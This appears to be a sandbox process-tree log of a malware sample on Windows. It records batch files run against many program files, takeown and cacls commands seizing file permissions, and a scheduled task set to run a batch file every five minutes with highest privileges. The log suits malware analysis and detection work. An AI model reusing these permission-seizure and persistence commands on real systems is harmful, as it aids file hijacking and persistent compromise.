C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt""2⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "WinMail.exe.mui" -nobanner3⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf""2⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp" /E /G Admin:F /C3⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif""2⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "MyriadPro-BoldIt.otf" -nobanner3⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "CP1253.TXT" -nobanner4⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT"4⤵
-
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf" /E /G Admin:F /C3⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif""2⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "turnOnNotificationInAcrobat.gif" -nobanner3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif"3⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Mail\wab.exe""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Journal\Templates\Music.jtp""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Journal\PDIALOG.exe""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Journal\fr-FR\PDIALOG.exe.mui""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Journal\en-US\MSPVWCTL.DLL.mui""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Journal\de-DE\Journal.exe.mui""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Windows Mail\WinMail.exe""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Windows Mail\fr-FR\msoeres.dll.mui""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Microsoft Games\Chess\ChessMCE.png""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif""2⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "Identity-V" -nobanner3⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Mail\it-IT\msoeres.dll.mui""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Mail\de-DE\msoeres.dll.mui""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Journal\Templates\Genko_2.jtp""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Journal\ja-JP\MSPVWCTL.DLL.mui""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Journal\it-IT\Journal.exe.mui""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Journal\fr-FR\jnwmon.dll.mui""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Journal\es-ES\jnwdui.dll.mui""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Journal\en-US\JNTFiltr.dll.mui""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Users\All Users\Microsoft\Network\Downloader\qmgr0.dat""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoAcq.dll.mui""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Windows Mail\ja-JP\WinMail.exe.mui""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp""2⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "symbol.txt" -nobanner3⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf""2⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "DisplayLanguageNames.en_CA.txt" -nobanner3⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Mail\wabmig.exe""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Windows Mail\it-IT\msoeres.dll.mui""2⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula -c Run -y -p extract -nobanner3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "NBMapTIP.dll.mui" -nobanner3⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\it-IT\NBMapTIP.dll.mui"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\it-IT\NBMapTIP.dll.mui" /E /G Admin:F /C3⤵
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Mail\es-ES\WinMail.exe.mui""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Windows Mail\de-DE\msoeres.dll.mui""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Journal\Templates\Seyes.jtp""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Journal\Templates\blank.jtp""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Journal\ja-JP\jnwdui.dll.mui""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Journal\it-IT\JNTFiltr.dll.mui""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Journal\es-ES\PDIALOG.exe.mui""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Journal\en-US\NBMapTIP.dll.mui""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Journal\de-DE\MSPVWCTL.DLL.mui""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Mail\ja-JP\msoeres.dll.mui""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Mail\en-US\msoeres.dll.mui""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Journal\Templates\Memo.jtp""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Journal\ja-JP\PDIALOG.exe.mui""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Journal\it-IT\NBMapTIP.dll.mui""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Journal\fr-FR\MSPVWCTL.DLL.mui""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Journal\es-ES\Journal.exe.mui""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Journal\en-US\jnwmon.dll.mui""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files\Windows Journal\de-DE\jnwdui.dll.mui""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Windows Mail\it-IT\WinMail.exe.mui""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Windows Mail\de-DE\WinMail.exe.mui""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Users\All Users\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths""2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\8AL8e2kp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt""2⤵
-
-
C:\Windows\SysWOW64\wscript.exewscript //B //Nologo "C:\Users\Admin\AppData\Roaming\uxBbuLmF.vbs"1⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\u3kKsgfY.bat" /sc minute /mo 5 /RL HIGHEST /F2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\u3kKsgfY.bat" /sc minute /mo 5 /RL HIGHEST /F3⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png"3⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "Seyes.jtp" -nobanner4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA2⤵
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy.exe3KvhBUKy.exe -accepteula "wab.exe" -nobanner3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c 3KvhBUKy.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\3KvhBUKy64.exe3KvhBUKy.exe -accepteula "StandardBusiness.pdf" -nobanner1⤵
- Drops file in Drivers directory
- Sets service image path in registry
- Executes dropped EXE
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
